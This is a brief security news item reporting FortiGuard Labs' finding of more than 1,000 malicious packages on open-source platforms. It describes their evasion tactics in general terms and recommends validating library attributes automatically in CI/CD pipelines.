Over 1000 Malicious Packages Found Exploiting Open-Source Platforms

Fortinet’s FortiGuard Labs has identified over 1,000 malicious software packages targeting open-source platforms since November 2024. Their analysis reveals sophisticated evasion tactics including minimal code in low file counts, suspicious installation scripts, missing repository URLs, and hidden command-and-control communications. The research uncovered malicious Python packages collecting system information, Node.js scripts harvesting sensitive data via Discord webhooks, and obfuscated JavaScript installing backdoors. Security experts recommend organizations implement proactive defence measures including automated validation of library attributes during CI/CD pipelines to detect these increasingly sophisticated threats before they reach production environments.